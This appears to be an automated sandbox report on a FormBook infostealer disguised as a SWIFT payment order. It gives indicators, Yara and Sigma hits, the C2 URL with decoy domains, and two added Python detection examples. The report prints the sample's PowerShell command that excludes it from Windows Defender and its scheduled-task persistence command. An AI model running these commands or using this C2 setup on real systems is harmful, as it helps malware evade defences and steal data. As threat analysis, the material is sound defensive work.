

Windows Analysis Report TT_SWIFT_Export Order_noref S10SMG00318021.exe

Overview

General Information

Sample Name: TT_SWIFT_Export Order_noref S10SMG00318021.exe
Analysis ID: 528704
MD5: fff91c58119d3cd7f68457e8565f7116
SHA1: 4201eb7214bd3658889739e4856412b8063e0405
SHA256: f8c0d385ece89cd926b2c74680c036f9927414955e7ff4ed12b576470b8c1745
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicious Add Task From User AppData Temp
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • TT_SWIFT_Export Order_noref S10SMG00318021.exe (PID: 3456 cmdline: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" MD5: FFF91C58119D3CD7F68457E8565F7116)
    • powershell.exe (PID: 2540 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6252 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6360 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • TT_SWIFT_Export Order_noref S10SMG00318021.exe (PID: 6448 cmdline: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe MD5: FFF91C58119D3CD7F68457E8565F7116)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • autochk.exe (PID: 1884 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
      • help.exe (PID: 4592 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.liberia-infos.net/46uq/"], "decoy": ["beardeddentguy.com", "envirobombs.com", "mintbox.pro", "xiangpusun.com", "pyjama-france.com", "mendocinocountylive.com", "innovativepropsolutions.com", "hpsaddlerock.com", "qrmaindonesia.com", "liphelp.com", "archaeaenergy.info", "18446744073709551615.com", "littlecreekacresri.com", "elderlycareacademy.com", "drshivanieyecare.com", "ashibumi.com", "stevenalexandergolf.com", "adoratv.net", "visitnewrichmond.com", "fxbvanpool.com", "aarondecker.online", "environmentalkivul.com", "cardsncrepes.com", "hopdongdientu-viettel.com", "thebroughtguarantee.com", "howtofindahotniche.com", "1678600.win", "pityana.com", "akconsultoria.com", "markazkreasindo.com", "ronniecapitol.com", "tailsontour.com", "abros88.com", "laboratoriodentaltj.com", "fuckingmom86.xyz", "5pz59.com", "centralmadu.com", "ispecwar.com", "otetransportanddispatching.com", "cartaovirtual.net", "hsadmin.xyz", "xn--12c2bed4dxay5cxdh1s.online", "oki-net.com", "scenekidfancams.com", "preciousmugs.com", "754711.com", "helpigservices.com", "blueharepress.com", "xmshzs.com", "lovelycharlestonhomes.com", "wamhsh.com", "burlesquercize.com", "oppoexch.com", "ditjai.tech", "the-hausd-group.com", "loosebland.website", "syntheticloot.net", "gzfusco.com", "www-by.com", "farraztravel.com", "beheld3d.art", "douyababy.space", "elcuerpohumano.xyz", "3soap.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(34 further memory-dump matches not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings
8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(17 further unpacked-PE matches not shown)
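The Yara listings above are fixed byte sequences with the offsets at which each was found in a dump. The block below is an added example, not the Joe Security, yara-signator or JPCERT/CC rule itself, of how such a listing is produced: it scans a buffer for the sequences quoted in the report and records every offset. The match condition (at least 7 of the 10 Formbook_1 sequences plus all three sqlite3 constants) is an assumption, since the real rules' conditions are not on the page, and the scanned buffer is constructed, not a real memory dump.

```python
import re

# Byte sequences copied from the report's Yara match listing. The first set is
# the yara-signator rule Formbook_1; the second is the JPCERT/CC rule, whose
# three strings are each a PUSH (opcode 68) of a 32-bit immediate.
FORMBOOK_1 = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax: the RDTSC timing
    # check the report flags under "Tries to detect virtualization".
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}
JPCERT_SQLITE = {
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def hexseq(text):
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f'."""
    return bytes.fromhex(text.replace(" ", ""))


def scan(buf, patterns):
    """Return {name: [offsets]} for every pattern present in buf, all occurrences."""
    found = {}
    for name, hexs in patterns.items():
        offs = [m.start() for m in re.finditer(re.escape(hexseq(hexs)), buf)]
        if offs:
            found[name] = offs
    return found


def verdict(buf, min_formbook1=7, need_all_sqlite=True):
    """Assumed condition: >= min_formbook1 of the Formbook_1 sequences and all
    three sqlite3 constants. Returns (matched, formbook1_hits, sqlite_hits)."""
    f1 = scan(buf, FORMBOOK_1)
    sq = scan(buf, JPCERT_SQLITE)
    matched = len(f1) >= min_formbook1 and (not need_all_sqlite or len(sq) == 3)
    return matched, f1, sq


def build_sample():
    """Constructed buffer: 0x1000 bytes of int3 filler with the sequences planted
    at known offsets. sequence_0 is planted twice (the report shows two hits)
    and sequence_7 is left out, so 9 of 10 are present."""
    buf = bytearray(b"\xcc" * 0x1000)
    plan = [("sequence_0", 0x100), ("sequence_0", 0x180), ("sequence_1", 0x200),
            ("sequence_2", 0x280), ("sequence_3", 0x300), ("sequence_4", 0x380),
            ("sequence_5", 0x400), ("sequence_6", 0x480), ("sequence_8", 0x500),
            ("sequence_9", 0x580)]
    for name, off in plan:
        seq = hexseq(FORMBOOK_1[name])
        buf[off:off + len(seq)] = seq
    for off, name in zip((0x600, 0x640, 0x680), JPCERT_SQLITE):
        seq = hexseq(JPCERT_SQLITE[name])
        buf[off:off + len(seq)] = seq
    return bytes(buf)


if __name__ == "__main__":
    matched, f1, sq = verdict(build_sample())
    print("FormBook:", matched)
    for name, offs in {**f1, **sq}.items():
        print(f"  {name}: {', '.join(hex(o) for o in offs)}")
```

To use it on a real dump, read the `.unpack` or `.sdmp` file into `buf` and call `verdict`; offsets reported for a raw file and for the mapped image differ by the section alignment delta, which is why the report lists the same sequence at 0x7818 in the `.unpack` and 0x8618 in the `.raw.unpack`.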

          Sigma Overview

          System Summary:

Sigma detected: Suspicious Add Task From User AppData Temp
Source: Process started, Author: frack113, Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" , ParentImage: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ParentProcessId: 3456, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp, ProcessId: 6360
Sigma detected: Powershell Defender Exclusion
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" , ParentImage: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ParentProcessId: 3456, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ProcessId: 2540
Sigma detected: Non Interactive PowerShell
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe" , ParentImage: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ParentProcessId: 3456, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, ProcessId: 2540
Sigma detected: T1086 PowerShell Execution
Source: Pipe created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Data: PipeName: \PSHost.132823638078737098.2540.DefaultAppDomain.powershell
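The two process-creation hits above (a Defender exclusion added through PowerShell, and a scheduled task created from an XML file in the user's Temp folder) together with the explorer.exe network activity in the process tree can be reproduced as host-side detection logic. The block below is an added example, not Joe Sandbox or Sigma project code. Its event records are constructed to mirror the report's process tree (command-line quoting normalised; the report prints command lines without the opening quote), the field names follow Sysmon-style process and network events and are an assumption of the example, and the rule names are the example's own.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str                 # "process" (creation) or "network" (outbound connect)
    image: str                # full path of the acting process
    command_line: str = ""
    parent_image: str = ""
    dest_ip: str = ""
    dest_port: int = 0


SAMPLE = r"C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"

# Constructed events modelled on the report. The last two are benign controls
# (a task created from ProgramData, a read-only Get-MpPreference) that must not fire.
EVENTS = [
    Event("process", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          rf'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
          rf'Add-MpPreference -ExclusionPath "{SAMPLE}"', SAMPLE),
    Event("process", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
          r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe"', SAMPLE),
    Event("process", r"C:\Windows\SysWOW64\schtasks.exe",
          r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" '
          r'/XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp"', SAMPLE),
    Event("network", r"C:\Windows\explorer.exe", dest_ip="23.227.38.74", dest_port=80),
    Event("process", r"C:\Windows\System32\schtasks.exe",
          r'"C:\Windows\System32\schtasks.exe" /Create /TN "Nightly" '
          r'/XML "C:\ProgramData\Backup\nightly.xml"', r"C:\Windows\System32\cmd.exe"),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-MpPreference',
          r"C:\Windows\explorer.exe"),
]

# Add-MpPreference with any exclusion switch; group 1 is the excluded path/process/extension.
DEFENDER_EXCLUSION = re.compile(
    r'Add-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\s+"?([^"]+)"?', re.I)
# schtasks /Create whose /XML definition lives under the user's Local\Temp.
SCHTASKS_TEMP_XML = re.compile(
    r'/Create\b.*?/XML\s+"?([^"]*\\AppData\\Local\\Temp\\[^"]*)', re.I)
USER_WRITABLE = re.compile(r'^[A-Za-z]:\\Users\\', re.I)
# Processes the sample injected into in this report (hollowing targets).
INJECTION_HOSTS = {"explorer.exe", "autochk.exe", "help.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev):
    """Return (rule, detail) pairs that fire on a single event."""
    hits = []
    if ev.kind == "process":
        name = basename(ev.image)
        if name == "powershell.exe":
            m = DEFENDER_EXCLUSION.search(ev.command_line)
            if m:
                hits.append(("powershell_defender_exclusion", m.group(1)))
        if name == "schtasks.exe":
            m = SCHTASKS_TEMP_XML.search(ev.command_line)
            if m:
                hits.append(("schtasks_xml_from_user_temp", m.group(1)))
        # Escalate when the LOLBin was driven by a parent in a user-writable path.
        if hits and USER_WRITABLE.match(ev.parent_image):
            hits.append(("lolbin_parent_in_user_dir", ev.parent_image))
    elif ev.kind == "network":
        if basename(ev.image) in INJECTION_HOSTS and ev.dest_port in (80, 443):
            hits.append(("system_process_outbound_http", f"{ev.dest_ip}:{ev.dest_port}"))
    return hits


def run(events):
    """Group all hits by rule name, preserving event order."""
    report = {}
    for ev in events:
        for rule, detail in detect(ev):
            report.setdefault(rule, []).append(detail)
    return report


if __name__ == "__main__":
    for rule, details in run(EVENTS).items():
        print(rule)
        for d in details:
            print("   ", d)
```

The captured exclusion paths double as the remediation list: each value under `powershell_defender_exclusion` is an entry to remove from Defender's exclusions, and the `schtasks_xml_from_user_temp` value is the task definition whose task (`Updates\AnsPejV` here) should be deleted.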

          Jbx Signature Overview


          AV Detection:

Found malware configuration
Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (the same C2 list and decoy domains shown under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match, File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.hpsaddlerock.com/46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3, Avira URL Cloud: Label: malware
Source: www.liberia-infos.net/46uq/, Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\AnsPejV.exe, ReversingLabs: Detection: 35%
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe, Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop ebx

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49823 -> 154.196.11.204:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.innovativepropsolutions.com
Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe, Domain query: www.aarondecker.online
Source: C:\Windows\explorer.exe, Domain query: www.754711.com
Source: C:\Windows\explorer.exe, Domain query: www.pyjama-france.com
Source: C:\Windows\explorer.exe, Domain query: www.wamhsh.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Domain query: www.hpsaddlerock.com
Source: C:\Windows\explorer.exe, Domain query: www.blueharepress.com
Source: C:\Windows\explorer.exe, Network Connect: 156.226.250.165 80
Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.163 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.liberia-infos.net/46uq/
